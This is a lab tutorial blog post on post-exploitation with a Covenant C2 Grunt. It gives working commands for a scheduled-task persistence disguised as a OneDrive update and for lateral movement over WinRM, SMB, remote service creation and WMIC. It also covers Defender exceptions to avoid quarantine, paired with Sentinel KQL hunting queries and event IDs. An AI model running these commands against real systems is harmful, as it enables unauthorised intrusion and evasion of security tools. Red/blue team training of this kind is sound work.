In Part 2 of this series, we established a Covenant C2 connection by launching a Grunt on the victim system (test001) under user John. Now that the Grunt session is live, what happens next?
In this post, we’ll explore the immediate blue team detection, the attacker’s essential persistence and lateral movement steps, and how to hunt for these activities using Microsoft Sentinel.
We’ll keep things simple and follow the lab story:
- The attacker operates from Commando VM
- The victim is test001, logged in as John
- The tools used are familiar Microsoft Defender and Sentinel capabilities
Let’s go.
Detecting the Covenant Grunt (Blue Team Perspective)
Once the Covenant Grunt connects, Microsoft Defender for Endpoint may raise alerts such as:
- Suspicious .NET command execution
- Unusual outbound HTTP connections
- Possible command-and-control behavior
In the Microsoft 365 Defender portal, this might show up as:
- An alert tied to test001
- The user John
- A process like GruntHTTP.exe, powershell.exe, or rundll32.exe
Security teams would see the alert, drill into the timeline, and see the entire sequence of events: who ran what, when, and what network connections occurred.
If you’re monitoring these endpoints, keep an eye out for:
- Executable file launches from temp or user folders
- Encoded or obfuscated PowerShell
- Outbound connections to uncommon internal IPs or ports
Tip: If you’re testing this in your lab with Defender enabled, you may need to set alerts to “audit only” or create exceptions so it doesn’t auto-quarantine your payload.
Maintaining Access: Persistence via Scheduled Task
You don’t want to lose the Grunt if the victim logs off or reboots. You need persistence.
One of the easiest (and noisiest) ways is to create a scheduled task.
From your Grunt on test001, you can run:
schtasks /create /sc onlogon /tn "OneDrive Update" /tr "C:\Users\John\AppData\Local\Temp\update.bat" /f
This:
- Runs every time John logs in
- Launches update.bat, which contains your Covenant launcher or callback logic
- Uses a widespread and non-threatening task name
To verify:
schtasks /query /tn "OneDrive Update" /fo LIST /v
This is great from a red team perspective — you’ll re-establish access the next time John logs in.
How Blue Team Sees It:
When this task is created:
- A Windows Security Event ID 4698 is generated
- Defender for Endpoint records a ScheduledTaskCreated signal
- It’s tied to the user John, device test001
Defenders reviewing logs or using KQL in Microsoft Sentinel can spot this easily (we’ll do that later).
Spreading Out: Simple Lateral Movement
Now that you have a foothold, let’s say you want to pivot to test002 — another machine in the network.
Option 1: PowerShell Remoting (WinRM)
If WinRM is enabled (and it often is):
Enter-PSSession -ComputerName test002 -Credential John
#Or to execute a quick command remotely:
Invoke-Command -ComputerName test002 -Credential John -ScriptBlock { hostname; whoami }
From here, you could drop a launcher and get a new Grunt from test002.
Option 2: SMB with Remote Service Execution
Step 1 – Connect to admin share:
net use \\test002\C$ /USER:TESTLAB\John <password> #Step 2 – Copy your payload: copy GruntHTTP.exe \\test002\C$\Users\Public\GruntHTTP.exe #Step 3 – Remotely execute it via service: sc \\test002 create "UpdateSvc" binPath= "C:\\Users\\Public\\GruntHTTP.exe" start= demand sc \\test002 start "UpdateSvc" #Or via WMI: wmic /node:test002 /user:TESTLAB\John process call create "C:\Users\Public\GruntHTTP.exe" #Boom — you’ve moved laterally and potentially launched another Grunt.
What the Blue Team Sees:
On test002, logs will show:
- 4624: Successful logon by John (type 3 – network logon)
- 4672: Privileges assigned if John is an admin
- 7045: New service installed (via sc create)
Defender for Endpoint might generate alerts like:
- Suspicious service creation
- Remote code execution attempt
- Lateral movement detected
These are all great hunting clues — and we’ll show how to use Sentinel next.
Hunting the Attack in Microsoft Sentinel
Assuming you have Microsoft Sentinel connected to Defender logs and Security Events, here’s how you can hunt for all of this.
Scheduled Task Creation (Persistence)
SecurityEvent
| where EventID == 4698
| where Computer == "test001"
| project TimeGenerated, Account, TaskName, Command
#You’ll see the task OneDrive Update created by John.
#Lateral Movement via Logon Events
SecurityEvent
| where EventID == 4624 and LogonType == 3
| where Account contains "John"
| where Computer != "test001"
#This finds places where John logged in <strong>from another system</strong> — like when you used SMB or PowerShell Remoting to hit test002.
#Service Creation Events (Remote Execution)
SecurityEvent
| where EventID == 7045
| where Computer == "test002"
#This catches the creation of the fake “UpdateSvc” service and shows who created it and from where.
#Defender Alerts (Grunt Activity, Remote Access)
SecurityAlert
| where ProductName == "Microsoft Defender for Endpoint"
| where Computer in ("test001", "test002")
| project TimeGenerated, AlertName, Computer, Account
Look here for signs like:
- Unusual PowerShell execution
- C2 communication
- Credential dumping
- Lateral movement detections
These alerts often relate to a single Incident inside Microsoft 365 Defender, and Sentinel will correlate that, too.
Recap
Here’s what we did in this lab cycle:
- Got a Covenant Grunt running on test001
- Maintained persistence with a scheduled task
- Used WinRM and SMB to move laterally to test002
- Showed how the Blue Team can detect all of it using Defender and Sentinel
You’ve now simulated an entire mini-attack lifecycle in your lab — initial access, persistence, lateral movement, and detection. That’s serious red + blue team growth.
Part of a Bigger Journey
This blog series supports the complete training guide:
Red Teaming and Blue Teaming with Microsoft Defender XDR
It’s packed with hands-on examples for IT pros learning to think like attackers and defenders.
Stick with us—next, we’ll discuss credential access, using tools like Mimikatz, and how to catch attackers before they make their move.
Let me know when you’re ready for Part 4!
John Sr.
